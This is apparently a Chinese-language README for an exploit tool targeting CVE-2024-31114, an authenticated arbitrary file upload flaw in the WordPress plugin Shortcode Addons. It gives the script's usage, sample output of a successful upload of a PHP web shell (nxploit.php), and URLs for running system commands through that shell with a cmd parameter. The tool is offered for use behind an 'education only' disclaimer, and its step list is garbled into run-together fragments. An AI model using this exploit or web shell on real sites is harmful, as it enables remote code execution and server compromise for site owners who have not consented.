
Shortcode Addons <= 3.2.5 – 已认证(管理员+)任意文件上传
CVE ID: CVE-2024-31114
CVSS 评分: 9.1(严重)
Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension WordPress 插件由于缺少文件类型验证,在所有版本 直至 3.2.5(含) 中存在任意文件上传漏洞。
该漏洞允许拥有管理员级别或更高权限的已认证攻击者向服务器上传任意文件——从而可能导致远程代码执行(RCE)。
该 Python 脚本自动化利用此漏洞。它执行以下操作:
_wpnonce)nxploit.php).zip 文件whoami 命令usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - 已认证(管理员+)任意文件上传
作者:Nxploited | Khaled Alenazi
options:
-h, --help 显示此帮助信息并退出
-u, --url URL 目标 URL(例如 http://target.com)
-un, --username USERNAME WordPress 管理员用户名
-p, --password PASSWORD WordPress 管理员密码
[+] 认证成功。
[+] 已提取 _wpnonce:9d8dbbc630
[+] 已创建 Payload nxploit.zip。
[+] 已上传 Payload。
[+] Shell 可访问地址:http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] 命令输出:
------------------
www-data
------------------
[+] 已删除临时文件。
一旦 payload 上传成功,你可以使用以下格式执行系统命令:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 示例:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
这将列出服务器当前目录的内容。
此工具仅用于教育和授权测试目的。
作者不对因使用此脚本造成的任何滥用或损害负责。
请负责任地使用,并仅在你拥有明确权限的系统上进行测试。
作者: Nxploited | Khaled Alenazi